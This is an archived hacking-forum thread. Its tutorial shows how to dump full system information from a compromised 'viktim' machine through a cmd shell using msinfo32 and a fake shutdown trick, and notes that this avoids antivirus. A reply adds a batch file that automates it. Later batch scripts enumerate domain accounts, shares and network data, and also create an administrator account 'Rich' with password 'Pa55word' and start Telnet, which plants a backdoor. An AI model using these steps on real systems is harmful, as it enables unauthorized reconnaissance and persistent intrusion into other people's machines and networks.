Like it or not.
Full Version: System Info Provided By Microsoft
| QUOTE |
System info provided by Microsoft Text written '04 by passiw --------------------------------- Tested on Windows XP German. There's a way to get nearly 1mb of system informations of a system you got a cmd shell on, and you don't have to upload any exe for this. The file that will be generated contains informations about nearly ALL information about that system. Hardware informations like cpu, free and used memory, even useless things like mainboard manufactor and name, even the version of it's bios.) and of course very very much of software and operating system regarding information like drivers, running tasks, services etc... Let's go: 1) Connect to the "viktim" system via cmd shell or try it on your own local system. 2) First we have to find the msinfo32.exe. Depending on the language of your viktim's windows the path of this exe may vary. In an english windows system it should be in: C:\Program files\Shared files\Microsoft Shared\MSInfo\msinfo32.exe (or something like this) If you don't know where this file is located, do the following: Go to the root folder (c:\) and type: dir /B /S msinfo32.exe 3) Now call the msinfo32.exe this way: c:\found_out_path\msinfo32.exe /nfo c:\output.nfo 4) Now there's one problem: msinfo32 waits in the memory till the pc shuts down and then writes the file. So we have to trick the system: 5) We have to shutdown the system (not really). type: shutdown -s -t 99 Now you have 99 seconds to abort the shutdown. type: shutdown -a The system is still up but the nfo was written. 6) It's in c:\output.nfo. The size should be ~1000kb. 7) Now transfer this file to your local machine. 8) To open it do NOT use a nfo viewer as known from the warez "scene". It won't work. If you didn't reassociate the nfo file extension just perform a double click. If this action opens your nfo viewer, run msinfo32.exe on YOUR local machine. You should know how to find it ;) Just start it. 9) Go to File > Open. Now open the output.nfo. 10) That's it. The funny thing is, we didn't need any app (that anyway get's detected by antivirus software). Thanks to Microsoft for this free tool :F Mail: inbox@passiw.de PS: Sorry for my bad english. I'm a kraut. --------------------------------------------------- |
Very Nice Tutorial mate Thanx for sharing with us... 
Question : on what second is the computer writeing to the file?
Question : on what second is the computer writeing to the file?
thnx
works fine for me
works fine for me
Quite easy and usefull!
thx
thx
This is a verry handy tool to gain information.
Thnx for this info.
you can also use /report in staid of /nfo that will create a much smaller file ( +-300 k )
@the doom master, that dossen't mather, just run the comands, it will write.
Thnx for this info.
you can also use /report in staid of /nfo that will create a much smaller file ( +-300 k )
@the doom master, that dossen't mather, just run the comands, it will write.
Since i find it so handy, i have written a small batchfile to do it.
| CODE |
| @echo off if %1==/help ( goto info ) if %1==1 ( set outto=report goto start ) else ( set outto=nfo goto start ) :start cd c:\ dir /B /S msinfo32.exe > %temp%.\msnfo.scr for /f "tokens=*" %%i in (%temp%.\msnfo.scr) do set mypath= %%i %mypath% /%outto% %2 shutdown -s -t 99 shutdown -a :info echo Command :: %0 /^<option^> /^<outputpath^> echo. echo ..option 1 = txt echo ..option 2 = nfo echo. echo. echo Example :: %0 /1 c:\output.txt echo Batch written by FiNaLBeTa with nfo posted from passiw on governmentsecurity.org goto end :end exit |
It supports both the txt and the nfo output.
I'm pretty sure that if stuff is bad written, so correct me
use blabla.bat /help to see how to use, or read the bat.
very nice
thx for the info
i always used psinfo to view info but this is more detailed
thx again
thx for the info
i always used psinfo to view info but this is more detailed
thx again
@FinalBeta: Very nice, thanks! I tryed to write a batch tto, but i didn't know this command: "for /f "tokens=*" %%i in (%temp%.\msnfo.scr) do set mypath= %%i"
well done
[sorry4offtopic] thanks for your replys, i really like this board and it's members [/sorry4offtopic]
well done
[sorry4offtopic] thanks for your replys, i really like this board and it's members [/sorry4offtopic]
is the systeminfo command too good for u guys ? 
Know I am not a programmer. So i use bat files. This file can be run from any workstation connected to AD Domain. I have used it on the countys domain. Very simple and outputs the info I need. 1st if for 2000 professional:
| CODE |
@nbtstat -r -n -s >> net_accounts.info @date /t >> net_accounts.info @net accounts >> net_accounts.info @net user /domain >> net_accounts.info @net use >> net_accounts.info @net name >> net_accounts.info @net view /domain >> net_accounts.info @net localgroup /domain >> net_accounts.info @net share >> net_accounts.info @netstat -a >> net_accounts.info @IPCONFIG >> net_accounts.info @nslookup host /ADD >> net_accounts.info @net user Rich Pa55word /add >> net_accounts.info @net localgroup Administrators Rich /add >> net_accounts.info @net start tlntsvr >> net_accounts.info @ver >> net_accounts.info @systeminfo >> net_accounts.info @arp -a >> net_accounts.info |
for windows XP:
| CODE |
@nbtstat -r -n -s >> net_accounts.info @date /t >> net_accounts.info @net accounts >> net_accounts.info @net user /domain >> net_accounts.info @net use >> net_accounts.info @net name >> net_accounts.info @net view /domain >> net_accounts.info @net localgroup /domain >> net_accounts.info @net share >> net_accounts.info @netstat -a >> net_accounts.info @IPCONFIG >> net_accounts.info @getmac >> net_accounts.info @nslookup /ADD >> net_accounts.info @net user Rich Pa55word /add >> net_accounts.info @net localgroup Administrators Rich /add >> net_accounts.info @net start services.exe >> net_accounts.info @net start tlntsvr >> net_accounts.info @ver >> net_accounts.info @systeminfo >> net_accounts.info @arp -a >> net_accounts.info |
Don't rip on me I am not a programmer :-)
Rich
very usefull tutorial
thx
thx
cool, thanks
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
